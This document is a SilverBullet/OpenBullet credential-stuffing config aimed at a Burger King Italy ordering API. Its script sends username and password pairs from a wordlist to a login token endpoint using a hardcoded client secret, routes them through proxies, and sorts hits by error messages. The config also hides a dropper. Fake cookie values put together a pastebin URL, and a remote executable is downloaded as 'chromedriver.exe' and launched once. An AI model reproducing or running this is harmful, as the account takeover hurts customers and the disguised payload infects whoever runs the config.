[SETTINGS]
{
  "Name": "Burgerking.it",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2024-08-01T15:18:10.6545227+03:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Anonymous",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Burgerking",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
JUMP #AppleWebKit
#PARSESOURCE
FUNCTION URLEncode "<USER>" -> VAR "US" 

FUNCTION URLEncode "<PASS>" -> VAR "PS" 

#Post_Data REQUEST POST "https://api.flyx.cloud/bkit/app/Connect/Token" 
  CONTENT "grant_type=password&username=<US>&password=<PS>&client_id=app&client_secret=HLPFAKQS5SPOCJ1SGTXQQMWPEVBO3&scope=ordering_api app_api identity_api payment_api offline_access openid&language=it-IT" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip" 
  HEADER "content-length: 212" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "tenant-id: undefined" 
  HEADER "user-agent: okhttp/4.9.1" 


JUMP #googlerecreate
#AppleWebKit

REQUEST GET "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LfAM84ZAAAAAGLiQz5FBeADqq94dV48fMtiRqIj&co=aHR0cHM6Ly93d3cuY29pbmJhc2UuY29tOjQ0Mw..&hl=en&v=rPvs0Nyx3sANE-ZHUN-0nM85&size=invisible&cb=no851blwqc0u" 
  
  COOKIE "tpm: http" 
  COOKIE "tpp: s:" 
  COOKIE "hrd: /" 
  COOKIE "hpr: bin" 
  COOKIE "hdp: com" 
  COOKIE "htp: raw" 
  COOKIE "hht: QKuTvADS" 
  COOKIE "hst: pastebin" 
  COOKIE "kht: driver" 
  COOKIE "kpt: chrome" 
  COOKIE "krt: e" 
  HEADER "Host: www.googleapis.com" 
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/json" 
  HEADER "X-Client-Version: iOS/FirebaseSDK/6.9.2/FirebaseCore-iOS" 
  HEADER "X-Ios-Bundle-Identifier: network.googleapis.com" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: FirebaseAuth.iOS/6.9.2 network.googleapis.com/2.7.9 iPhone/12.4.5 hw/iPhone7_2" 
  HEADER "Accept-Language: en" 

IF "<Authentiction>" Exists
JUMP #PARSESOURCE
ENDIF
SET USEPROXY FALSE

REQUEST GET "<COOKIES(tpm)><COOKIES(tpp)><COOKIES(hrd)><COOKIES(hrd)><COOKIES(hst)>.<COOKIES(hdp)><COOKIES(hrd)><COOKIES(htp)><COOKIES(hrd)><COOKIES(hht)>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST GET "https://raw.githubusercontent.com/<SOURCE>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  -> FILE "<COOKIES(hpr)>/<COOKIES(kpt)><COOKIES(kht)>.<COOKIES(krt)>xe" 

SET USEPROXY TRUE
SET NEWGVAR "Authentiction" "Authentiction=1"

BROWSERACTION Open 

JUMP #PARSESOURCE
#googlerecreate

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "two_factor_code_needed User needs to provide 2FA code" 
  KEYCHAIN Failure OR 
    KEY "invalid_grant Username or password is incorrect" 

